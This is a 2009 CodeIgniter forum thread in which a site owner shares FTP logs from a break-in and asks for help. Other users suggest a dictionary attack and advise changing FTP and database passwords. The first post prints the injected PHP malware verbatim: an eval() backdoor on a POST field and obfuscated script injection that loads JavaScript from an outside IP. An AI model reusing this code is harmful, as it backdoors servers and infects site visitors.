Login

04-29-2009, 12:47 AM

[eluser]Patient[/eluser]
Just had a codeigniter site hacked. It was accessed via ftp with a genuine ftp username. There are ~2700 ftp log entries within a 24 minute period. The ftp access went through the site directory retrieving pages and uploading many modified pages. The first few lines from the ftp log are (note xxxxxxxxxxxxxxxx = valid ftp user):

Code:
169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PASS (hidden)" 230 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PWD" 257 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "TYPE A" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,158,251" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "LIST /" 226 1432

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,222,47" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:27 -0500] "LIST /IE7" 226 1104

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "PORT 81,169,145,25,231,203" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "LIST /IE7/assets/director" 226 213

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "PORT 81,169,145,25,160,5" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "LIST /IE7/assets/img" 226 284

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,160,25" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "LIST /IE7/assets/js" 226 1091

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,237,105" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:34 -0500] "RETR /IE7/assets/js/effects.js" 226 38227

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:35 -0500] "PORT 81,169,145,25,240,127" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "STOR /IE7/assets/js/effects.js" 226 38453

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "PORT 81,169,145,25,243,1" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "RETR /IE7/assets/js/general.js" 226 870

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "PORT 81,169,145,25,244,181" 200 -

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "STOR /IE7/assets/js/general.js" 226 1096

169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:38 -0500] "PORT 81,169,145,25,246,133" 200 -

The modifications made to pages was:

PHP - added the following at the top of the page:

Quote:<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Nzb0ZjT2pjcjhuZ2lwZ0t0JTIwc29GcmNnSyUzRCUyRiUyRjk0bUxTJTJFMm9GNG9GN29GJTJFMiUyRTE5NSUyRmpxOG5ndWVPamNyeSUyRW1BamdLcyUzRSUzQ29GJTJGbUFzZ0tjbUxTcm1BaW9GcDhuZ3QlM0UnKS5yZXBsYWNlKC9tQXxnS3xtTFN8T2pjfDh4bXw4bmd8b0YvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#[removed]#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#[removed][removed]#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

JS - added the following to the bottom of the pages:

Quote:

HTML - added the following immediately before the <body> tag:

Quote:[removed][removed]

As far as I can see these are obfuscated commands to import a js file jquery.js from ip 94.247.2.195.

Anyone seen this?

Any way to protect the site?

04-29-2009, 01:39 AM

[eluser]Dam1an[/eluser]
If the site was hacked via ftp with a valid username and password, it isn't the fault of CI

04-29-2009, 01:46 AM

[eluser]Zeeshan Rasool[/eluser]
I hacked my own CI site with sql injection. I got the solution bcoz it was my own leakage of code.So, Im not sure,but its not CI fault

04-29-2009, 01:49 AM

[eluser]Patient[/eluser]
[quote author="zEsHaN" date="1241009163"]I hacked my own CI site with sql injection. I got the solution bcoz it was my own leakage of code.So, Im not sure,but its not CI fault[/quote]

No need to defend CI - I'm not attacking it.

What "holes" in my code do I need to close to prevent this happening again?

04-29-2009, 02:01 AM

[eluser]Dam1an[/eluser]
Its not so much about fixing 'holes in your' code, as if they have FTP access, they can change to their hearst content

Assuming they have access to the full server via FTP (not just the web root) you could try setting all the file permissions to read only (using a non ftp account, obviously)

04-29-2009, 02:03 AM

[eluser]Patient[/eluser]
[quote author="Dam1an" date="1241010062"]Its not so much about fixing 'holes in your' code, as if they have FTP access, they can change to their hearst content

Assuming they have access to the full server via FTP (not just the web root) you could try setting all the file permissions to read only (using a non ftp account, obviously)[/quote]

The question is how did they gain ftp access?

04-29-2009, 02:11 AM

[eluser]wwwald[/eluser]
That's up to you to find out. In any case, the FTP credentials for your hosting account are not related to CI in any way, but I think we are clear on that by now.

I'd contact your hosting firm first, to check if they have noticed any irregularities. What FTP server software are they using, in what version? Any known vulnerabilities there?

04-29-2009, 02:18 AM

[eluser]Dam1an[/eluser]
Also, if you're ftp username something obvious (any dictionary word for that matter), how secure is your password? Uppercase, lowercase, numbers, symbols?

04-29-2009, 02:52 AM

[eluser]johnwbaxter[/eluser]
It was probably a dictionary attack on FTP users on your server. You need to change all active ftp usernames and passwords to something complex as a first thing, then restore the site they messed with from backup if possible.

Also if there were any passwords or usernames for DB access in your CI site, you need to change those too.

04-29-2009, 03:50 AM

[eluser]Patient[/eluser]
[quote author="audiopleb" date="1241013149"]It was probably a dictionary attack on FTP users on your server. You need to change all active ftp usernames and passwords to something complex as a first thing, then restore the site they messed with from backup if possible.

Also if there were any passwords or usernames for DB access in your CI site, you need to change those too.[/quote]

Thanks audiopleb.

Changing things now (may sound a bit dim but i missed the fact that in retrieving the config/database files they got password access to my database!!).